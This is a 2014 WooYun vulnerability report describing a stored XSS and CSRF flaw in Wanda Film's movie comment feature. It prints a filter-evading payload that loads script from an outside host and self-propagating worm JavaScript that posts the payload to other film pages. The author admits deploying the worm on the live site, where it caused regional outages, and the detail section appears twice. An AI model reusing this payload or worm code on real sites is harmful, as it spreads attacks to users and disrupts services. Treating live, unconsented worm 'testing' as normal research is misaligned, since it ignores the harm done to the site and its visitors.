漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-073160
漏洞标题:万达电影主站 xss + csrf 又是蠕虫
相关厂商:大连万达集团股份有限公司
漏洞作者: 0x_Jin
提交时间:2014-08-20 13:45
修复时间:2014-10-04 13:46
公开时间:2014-10-04 13:46
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-20: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商已经确认,细节仅向厂商公开
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-10-04: 细节向公众公开
简要描述:
又是蠕虫,主站已出现区域性无法访问 我不是故意的。。。。我只是测试一下 赶快确认了把 我好把js给删了 你要是不确认我也不好删啊。。。。 真心说一声抱歉。。。
详细说明:
漏洞存在于 电影的评论处,要加载js过滤规则挺严的!
先上payload:<img src=x onerror=$['get\123cript']('//20.rs') width=0>
对script 做了检测 于是便用js8 对S做了下编码
然后成功加载js :
再来看下xss平台上所收到的:
由于万达功能比较少 为了证明漏洞影响。。。于是我。。。。
又玩了次蠕虫,上代码:
var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment";
var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code=";
if (window.XMLHttpRequest){
var xmlhttp1=new XMLHttpRequest();
}
else{
var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST",url,true);
xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
把filmId 的值替换成 想要蔓延过去的电影ID的值 就可以蔓延到另外一个电影。。。 为了减少影响范围 我只对20140507033232512405 20140707102851445844 这两部电影蠕了
来看看现在蠕了多少次了:
现在在持续增长中,目前已出现区域性无法访问:
漏洞地址在这里:
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140507033232512405.html
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140707102851445844.html
赶快确认吧 我好删除js!
漏洞证明:
漏洞存在于 电影的评论处,要加载js过滤规则挺严的!
先上payload:<img src=x onerror=$['get\123cript']('//20.rs') width=0>
对script 做了检测 于是便用js8 对S做了下编码
然后成功加载js :
再来看下xss平台上所收到的:
由于万达功能比较少 为了证明漏洞影响。。。于是我。。。。
又玩了次蠕虫,上代码:
var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment";
var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code=";
if (window.XMLHttpRequest){
var xmlhttp1=new XMLHttpRequest();
}
else{
var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp1.open("POST",url,true);
xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp1.send(sendata);
把filmId 的值替换成 想要蔓延过去的电影ID的值 就可以蔓延到另外一个电影。。。 为了减少影响范围 我只对20140507033232512405 20140707102851445844 这两部电影蠕了
来看看现在蠕了多少次了:
现在在持续增长中,目前已出现区域性无法访问:
漏洞地址在这里:
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140507033232512405.html
http://www.wandafilm.com/baseInfo/film/film_info_init_hot_20140707102851445844.html
赶快确认吧 我好删除js!
修复方案:
在你们现在的过滤基础上过滤的更加严格一点吧!
版权声明:转载请注明来源 0x_Jin@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-08-20 13:49
厂商回复:
感谢0x_Jin同学的关注与贡献!立即通知业务修复此漏洞!
最新状态:
暂无